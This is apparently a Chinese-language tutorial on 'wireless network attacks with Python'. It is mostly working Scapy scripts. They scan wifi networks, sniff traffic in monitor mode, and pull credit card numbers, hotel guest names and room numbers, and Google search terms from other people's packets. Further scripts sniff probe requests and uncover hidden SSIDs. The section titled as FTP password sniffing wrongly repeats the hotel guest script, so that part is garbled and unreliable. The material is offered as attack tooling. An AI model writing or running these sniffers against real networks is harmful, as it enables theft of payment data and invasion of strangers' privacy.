使用Python进行无线网络攻击
PyWifl 模块寻找wifi来源
# -*- coding: UTF-8 -*- import pywifi def bies(): wifi=pywifi.PyWiFi()#创建一个无限对象 ifaces=wifi.interfaces()[0]#取一个无线网卡 ifaces.scan()#扫描 bessis=ifaces.scan_results() for i in range(len(bessis)): print(bessis[i].ssid, bessis[i].signal) bies()
Wifl 侦听模块
import os from scapy.all import * iface = "en0" os.system("/usr/sbin/iwconfig " + iface + " mode monitor") # Dump packets that are not beacons, probe request / responses def dump_packet(pkt): if not pkt.haslayer(Dot11Beacon) and \ not pkt.haslayer(Dot11ProbeReq) and \ not pkt.haslayer(Dot11ProbeResp): print(pkt.summary()) if pkt.haslayer(Raw): print(hexdump(pkt.load)) print("\n") while True: for channel in range(1, 14): os.system("/usr/sbin/iwconfig " + iface + \ " channel " + str(channel)) print("Sniffing on channel " + str(channel)) sniff(iface=iface, prn=dump_packet, count=10, timeout=3, store=0)
用Scapy测试无线网卡的嗅探功能
测试嗅探无线网络的代码
#!/usr/bin/python #coding=utf-8 from scapy.all import * def pktPrint(pkt): if pkt.haslayer(Dot11Beacon): print '[+] Detected 802.11 Beacon Frame' elif pkt.haslayer(Dot11ProbeReq): print '[+] Detected 802.11 Probe Request Frame' elif pkt.haslayer(TCP): print '[+] Detected a TCP Packet' elif pkt.haslayer(DNS): print '[+] Detected a DNS Packet' conf.iface = 'wlan0mon' sniff(prn=pktPrint)
使用Python正则表达式嗅探信用卡信息
3种常用的信用卡:Visa、MasterCard和American Express。
#!/usr/bin/python #coding=utf-8 import re def findCreditCard(raw): # American Express信用卡由34或37开头的15位数字组成 americaRE = re.findall('3[47][0-9]{13}', raw) if americaRE: print '[+] Found American Express Card: ' + americaRE[0] def main(): tests = [] tests.append('I would like to buy 1337 copies of that dvd') tests.append('Bill my card: 378282246310005 for \$2600') for test in tests: findCreditCard(test) if __name__ == '__main__': main()
接着就加入Scapy来嗅探TCP数据包实现嗅探功能:
#!/usr/bin/python #coding=utf-8 import re import optparse from scapy.all import * def findCreditCard(pkt): raw = pkt.sprintf('%Raw.load%') # American Express信用卡由34或37开头的15位数字组成 americaRE = re.findall('3[47][0-9]{13}', raw) # MasterCard信用卡的开头为51~55,共16位数字 masterRE = re.findall('5[1-5][0-9]{14}', raw) # Visa信用卡开头数字为4,长度为13或16位 visaRE = re.findall('4[0-9]{12}(?:[0-9]{3})?', raw) if americaRE: print '[+] Found American Express Card: ' + americaRE[0] if masterRE: print '[+] Found MasterCard Card: ' + masterRE[0] if visaRE: print '[+] Found Visa Card: ' + visaRE[0] def main(): parser = optparse.OptionParser('[*]Usage: python creditSniff.py -i') parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on') (options, args) = parser.parse_args() if options.interface == None: print parser.usage exit(0) else: conf.iface = options.interface try: print '[*] Starting Credit Card Sniffer.' sniff(filter='tcp', prn=findCreditCard, store=0) except KeyboardInterrupt: exit(0) if __name__ == '__main__': main()
嗅探宾馆住客
#!/usr/bin/python #coding=utf-8 import optparse from scapy.all import * def findGuest(pkt): raw = pkt.sprintf('%Raw.load%') name = re.findall('(?i)LAST_NAME=(.*)&', raw) room = re.findall("(?i)ROOM_NUMBER=(.*)'", raw) if name: print '[+] Found Hotel Guest ' + str(name[0]) + ', Room #' + str(room[0]) def main(): parser = optparse.OptionParser('[*]Usage: python hotelSniff.py -i') parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on') (options, args) = parser.parse_args() if options.interface == None: print parser.usage exit(0) else: conf.iface = options.interface try: print '[*] Starting Hotel Guest Sniffer.' sniff(filter='tcp', prn=findGuest, store=0) except KeyboardInterrupt: exit(0) if __name__ == '__main__': main()
编写谷歌键盘记录器:
Google搜索,由“q=”开始,中间是要搜索的字符串,并以“&”终止,字符“pg=”后接的是上一个搜索的内容。
#!/usr/bin/python #coding=utf-8 import optparse from scapy.all import * def findGoogle(pkt): if pkt.haslayer(Raw): payload = pkt.getlayer(Raw).load if 'GET' in payload: if 'google' in payload: r = re.findall(r'(?i)\&q=(.*?)\&', payload) if r: search = r[0].split('&')[0] search = search.replace('q=', '').replace('+', ' ').replace('%20', ' ') print '[+] Searched For: ' + search def main(): parser = optparse.OptionParser('[*]Usage: python googleSniff.py -i') parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on') (options, args) = parser.parse_args() if options.interface == None: print parser.usage exit(0) else: conf.iface = options.interface try: print '[*] Starting Google Sniffer.' sniff(filter='tcp port 80', prn=findGoogle) except KeyboardInterrupt: exit(0) if __name__ == '__main__': main()
嗅探FTP登录口令:
#!/usr/bin/python #coding=utf-8 import optparse from scapy.all import * def findGuest(pkt): raw = pkt.sprintf('%Raw.load%') name = re.findall('(?i)LAST_NAME=(.*)&', raw) room = re.findall("(?i)ROOM_NUMBER=(.*)'", raw) if name: print '[+] Found Hotel Guest ' + str(name[0]) + ', Room #' + str(room[0]) def main(): parser = optparse.OptionParser('[*]Usage: python hotelSniff.py -i') parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on') (options, args) = parser.parse_args() if options.interface == None: print parser.usage exit(0) else: conf.iface = options.interface try: print '[*] Starting Hotel Guest Sniffer.' sniff(filter='tcp', prn=findGuest, store=0) except KeyboardInterrupt: exit(0) if __name__ == '__main__': main()
侦听无线 802.11 Probe请求
#!/usr/bin/python #utf-8 from scapy.all import * interface = 'wlan0mon' probeReqs = [] def sniffProbe(p): if p.haslayer(Dot11ProbeReq): netName = p.getlayer(Dot11ProbeReq).info if netName not in probeReqs: probeReqs.append(netName) print '[+] Detected New Probe Request: ' + netName sniff(iface=interface, prn=sniffProbe)
寻找隐藏网络的802.11信标
def sniffDot11(p): if p.haslayer(Dot11Beacon): if p.getlayer(Dot11Beacon).info == '': addr2 = p.getlayer(Dot11).addr2 if addr2 not in hiddenNets: print '[-] Detected Hidden SSID: with MAC:' + addr2 hiddenNets.append(addr2)
找出隐藏的802.11网络的网络名
#!/usr/bin/python #coding=utf-8 import sys from scapy import * interface = 'wlan0mon' hiddenNets = [] unhiddenNets = [] def sniffDot11(p): if p.haslayer(Dot11ProbeResp): addr2 = p.getlayer(Dot11).addr2 if (addr2 in hiddenNets) & (addr2 not in unhiddenNets): netName = p.getlayer(Dot11ProbeResp).info print '[+] Decloaked Hidden SSID : ' + netName + ' for MAC: ' + addr2 unhiddenNets.append(addr2) if p.haslayer(Dot11Beacon): if p.getlayer(Dot11Beacon).info == '': addr2 = p.getlayer(Dot11).addr2 if addr2 not in hiddenNets: print '[-] Detected Hidden SSID: with MAC:' + addr2 hiddenNets.append(addr2) sniff(iface=interface, prn=sniffDot11)